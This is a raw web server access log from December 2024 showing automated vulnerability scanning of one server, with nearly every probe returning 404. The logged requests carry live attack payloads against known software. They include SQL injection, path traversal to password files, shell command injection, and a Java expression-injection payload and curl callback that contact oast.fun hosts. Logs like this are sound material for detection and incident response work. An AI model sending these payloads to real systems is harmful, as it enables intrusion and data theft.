/wp-json/lp/v1/courses/archive-course order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/109.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 16:12:39 103.153.214.94 GET /3/ImportFiles path=%2Fetc%2Fpasswd 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 223 2024-12-12 16:12:43 103.153.214.94 POST /3/ParseSetup - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 210 2024-12-12 16:13:32 103.153.214.94 POST /userentry accountId=/../../../tomcat/webapps/gFRJk/&symbolName=test&base64UserName=YWRtaW4= 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.18+(KHTML,+like+Gecko)+Version/17.4+Safari/617.18 - 404 7 0 221 2024-12-12 16:13:44 103.153.214.94 GET /gFRJk/CVE-2023-47246.txt true 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 214 2024-12-12 16:15:18 103.153.214.94 POST /php/ping.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/113.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 16:15:18 103.153.214.94 POST /php/ping.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 230 2024-12-12 16:16:48 103.153.214.94 GET /wp-json/lp/v1/load_content_via_ajax/ callback={"class"%3a"LP_Debug","method"%3a"var_dump"}&args="2q6JQRVcDjBebFCj2mJnrWh9vwR" 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 227 2024-12-12 16:17:34 103.153.214.94 GET /index.php rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"} 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 - 404 7 0 203 2024-12-12 16:17:37 103.153.214.94 GET /wp-content/plugins/essential-blocks/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.13.10+(KHTML,+like+Gecko)+Version/17.2.97+Safari/616.13.10 - 404 7 0 212 2024-12-12 16:17:46 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.19041 - 404 7 0 199 2024-12-12 16:19:50 103.153.214.94 PUT /api/2.0/mlflow-artifacts/artifacts/2q6JQNfZaG6Jddfzk6tPbBCNRPM - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 224 2024-12-12 16:19:53 103.153.214.94 DELETE /api/2.0/mlflow-artifacts/artifacts/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2fpasswd - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 400 0 0 221 2024-12-12 16:20:23 103.153.214.94 GET /users/sign_in - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.138+Safari/537.36 - 404 7 0 220 2024-12-12 16:20:23 103.153.214.94 GET /php/ztp_gate.php/.js.map - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 225 2024-12-12 16:20:43 103.153.214.94 POST /ajax-api/2.0/mlflow/experiments/create - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 215 2024-12-12 16:21:21 103.153.214.94 PATCH /mgmt/tm/auth/user/hYSWZ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/618.3.5+(KHTML,+like+Gecko)+Version/17.4+Safari/618.3.5 - 404 7 0 226 2024-12-12 16:21:24 103.153.214.94 POST /mgmt/shared/authn/login - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 16:21:26 103.153.214.94 POST /mgmt/tm/util/bash - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 7 0 217 2024-12-12 16:21:30 103.153.214.94 PATCH /mgmt/tm/auth/user/hYSWZ - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 225 2024-12-12 16:21:32 103.153.214.94 POST /mgmt/shared/authn/login - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 16:21:36 103.153.214.94 POST /mgmt/tm/util/bash - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 236 2024-12-12 16:22:01 103.153.214.94 GET /api/login/unlockGetData - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.23 - 404 7 0 243 2024-12-12 16:22:04 103.153.214.94 POST /api/login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.22 - 404 7 0 236 2024-12-12 16:22:59 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 16:23:42 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 216 2024-12-12 16:23:45 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 16:23:48 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 202 2024-12-12 16:23:51 103.153.214.94 GET /model-versions/get-artifact path=random&name=acbLRD&version=2 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 206 2024-12-12 16:24:09 103.153.214.94 POST /api/file/formimage - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 202 2024-12-12 16:24:11 103.153.214.94 POST /classes/common/busiFacade.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 223 2024-12-12 16:25:39 103.153.214.94 POST /wp-json/post-smtp/v1/connect-app - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:97.0)+Gecko/20100101+Firefox/97.0 - 404 7 0 208 2024-12-12 16:25:43 103.153.214.94 POST /wp-json/post-smtp/v1/connect-app - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.22 - 404 7 0 199 2024-12-12 16:25:45 103.153.214.94 GET /wp-json/post-smtp/v1/get-log - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 202 2024-12-12 16:26:00 103.153.214.94 POST /assets/php/upload.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/617.2.4+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4 - 404 7 0 218 2024-12-12 16:28:06 103.153.214.94 POST /v6.58/Products/Authentication - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 16:29:02 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.19 - 404 7 0 213 2024-12-12 16:29:06 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 203 2024-12-12 16:29:10 103.153.214.94 GET /model-versions/get-artifact name=2q6JQgXDS2NmtMGkHxsliMfIalo&path=etc%2Fpasswd&version=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 244 2024-12-12 16:31:46 103.153.214.94 GET / rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 206 2024-12-12 16:33:15 103.153.214.94 GET /cgi-bin/account_mgr.cgi cmd=cgi_user_add&name=%27;id;%27 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 210 2024-12-12 16:33:15 103.153.214.94 GET /cgi-bin/account_mgr.cgi cmd=cgi_user_add&name=%27;ifconfig;%27 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 201 2024-12-12 16:34:00 103.153.214.94 GET /cgi-bin/account_mgr.cgi cmd=cgi_user_add&group=%27;ifconfig;%27 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 16:34:00 103.153.214.94 GET /cgi-bin/account_mgr.cgi cmd=cgi_user_add&group=%27;id;%27 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 16:34:12 103.153.214.94 GET /wp-login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 16:34:28 103.153.214.94 POST /Tool/uploadfile.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 216 2024-12-12 16:34:31 103.153.214.94 GET /home/spqdl.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 202 2024-12-12 16:35:14 103.153.214.94 GET / rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 220 2024-12-12 16:37:31 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 221 2024-12-12 16:37:35 103.153.214.94 GET /filex/read-raw url=http://oast.me&cut=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.25 - 404 7 0 214 2024-12-12 16:38:10 103.153.214.94 GET /backend/settings/oauth_adfs hostname=polar 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.135+Safari/537.36+Edge/12.10240 - 404 7 0 231 2024-12-12 16:38:10 103.153.214.94 POST /wp-json/notificationx/v1/analytics - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 233 2024-12-12 16:38:10 103.153.214.94 GET /cslu/v1/scheduler/jobs - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/88.0.4324.182+Safari/537.36 - 404 7 0 289 2024-12-12 16:39:57 103.153.214.94 POST /ajax-api/2.0/mlflow/experiments/create - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 212 2024-12-12 16:40:05 103.153.214.94 GET / p=1 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 16:40:06 103.153.214.94 GET /cslu/v1/var/logs/customer-cslu-lib-log.log - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 16:45:39 103.153.214.94 GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc method=getHeartBeat 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 5 0 236 2024-12-12 16:47:17 103.153.214.94 GET /api/v1/license/keys-status/;curl+ctd67t3bclspkptm3qo0gu5u79fx5tu3t.oast.fun - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 16:47:17 103.153.214.94 POST /dana-ws/saml20.ws - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 201 2024-12-12 16:47:59 103.153.214.94 POST /dana-na/auth/saml-sso.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 211 2024-12-12 16:47:59 103.153.214.94 POST /task/submit/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.18 - 404 7 0 220 2024-12-12 16:49:27 103.153.214.94 POST /ajax/ticket_user_db.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 231 2024-12-12 16:49:57 103.153.214.94 POST /ajax/calendar.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+U;+Linux+i686;+en-US)+AppleWebKit/534.1+SUSE/6.0.428.0+(KHTML,+like+Gecko)+Chrome/6.0.428.0+Safari/534.1 - 404 7 0 228 2024-12-12 16:49:57 103.153.214.94 POST /queue/join - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 218 2024-12-12 16:50:02 103.153.214.94 GET /queue/data session_hash=2q6JQdzt8SafSOwsuDZvfOl26e1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12.5)+AppleWebKit/617.19+(KHTML,+like+Gecko)+Version/17.6.47+Safari/617.19 - 404 7 0 225 2024-12-12 16:52:01 103.153.214.94 GET /item/list draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,2e37e5afbad648b19d3e3c4637272f9c,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 231 2024-12-12 16:52:01 103.153.214.94 POST /api/users - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.135+Safari/537.36+Edge/12.10240 - 404 7 0 231 2024-12-12 16:52:01 103.153.214.94 POST /component_server - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/106.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 16:52:03 103.153.214.94 POST /app/rest/users/id:1/tokens/2q6JQaGMwt5TW0GjOGD2YB7FZL9;.jsp jsp_precompile=true 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 400 0 0 248 2024-12-12 16:53:42 103.153.214.94 POST /clients/MyCRL - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 224 2024-12-12 16:54:54 103.153.214.94 POST /gremlin - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4.11.12 - 404 7 0 204 2024-12-12 16:55:25 103.153.214.94 GET /api/v3/user/orgs - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 224 2024-12-12 16:55:34 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:97.0)+Gecko/20100101+Firefox/97.0 - 404 7 0 218 2024-12-12 16:55:41 103.153.214.94 GET /importexport.php sql=c2VsZWN0KzksbWQ1KDk1OTQ2NzgpLDk=&type=exportexcelbysql 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 206 2024-12-12 16:55:58 103.153.214.94 POST /wp-content/plugins/wp-automatic/inc/csv.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 16:57:20 103.153.214.94 GET /api/v1;v1/users/login/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new+java.lang.String(T(java.util.Base64).getDecoder().decode("bnNsb29rdXAgY3RkNjd0M2JjbHNwa3B0bTNxbzB1ZGlwcGluYnJwN2ZoLm9hc3QuZnVu"))) - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 16:57:57 103.153.214.94 POST /wp-admin/admin-post.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 227 2024-12-12 17:00:04 103.153.214.94 GET /wp-content/plugins/LayerSlider/assets/static/public/front.css - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 17:00:36 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/22.0.0+Version/17.3.1+Safari/605.1.15 - 404 7 0 206 2024-12-12 17:00:44 103.153.214.94 PUT /goform/AccessControl - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 202 2024-12-12 17:00:47 103.153.214.94 GET /lCc2e.txt - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 206 2024-12-12 17:00:50 103.153.214.94 GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 214 2024-12-12 17:01:38 103.153.214.94 GET /cgi-bin/admin.cgi Command=sysCommand&Cmd=ifconfig 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 211 2024-12-12 17:02:49 103.153.214.94 GET /bin/register/XWiki/XWikiRegister xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 17:02:52 103.153.214.94 POST /bin/register/XWiki/XWikiRegister xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 204 2024-12-12 17:02:56 103.153.214.94 GET /xwiki/bin/register/XWiki/XWikiRegister xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.2+Safari/605.1.15 - 404 7 0 236 2024-12-12 17:03:00 103.153.214.94 POST /xwiki/bin/register/XWiki/XWikiRegister xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.65 - 404 7 0 222 2024-12-12 17:03:26 103.153.214.94 POST /WSStatusEvents/EventHandler.asmx - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 17:03:33 103.153.214.94 GET /streampipes-backend/api/v2/auth/settings - 8172 - 156.251.25.152 2q6JQckWK8oUhf5nNdWxLqJS3OO - 404 7 0 233 2024-12-12 17:05:14 103.153.214.94 POST /cmd,/simZysh/register_main/setCookie - 8172 - 156.251.25.152 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+(.NET+CLR+3.5.30729) - 404 7 0 207 2024-12-12 17:05:16 103.153.214.94 GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico type=sshd_tdc 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 215 2024-12-12 17:06:18 103.153.214.94 GET /RemoteApplicationMetadata.rem wsdl 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 234 2024-12-12 17:06:20 103.153.214.94 GET /index.php noAUTO=1 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Whale/3.26.244.21+Safari/537.36 - 404 7 0 206 2024-12-12 17:07:07 103.153.214.94 GET / InternalDir=/../../../../windows&InternalFile=win.ini 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 17:07:09 103.153.214.94 GET / InternalDir=\..\..\..\..\etc&InternalFile=passwd 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 17:07:33 103.153.214.94 POST /ajax-api/2.0/mlflow/experiments/create - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.54+Safari/537.36 - 404 7 0 225 2024-12-12 17:08:12 103.153.214.94 POST /admin/pr_monitor/getting_index_data.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.17+(KHTML,+like+Gecko)+Version/17.3.75+Safari/616.17 - 404 7 0 210 2024-12-12 17:11:41 103.153.214.94 GET /login.rst - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 17:11:41 103.153.214.94 GET /login.rst - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 17:12:57 103.153.214.94 POST /webtools/control/forgotPassword/ProgramExport - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.22 - 404 7 0 203 2024-12-12 17:13:38 103.153.214.94 POST /graphql - 8172 - 156.251.25.152 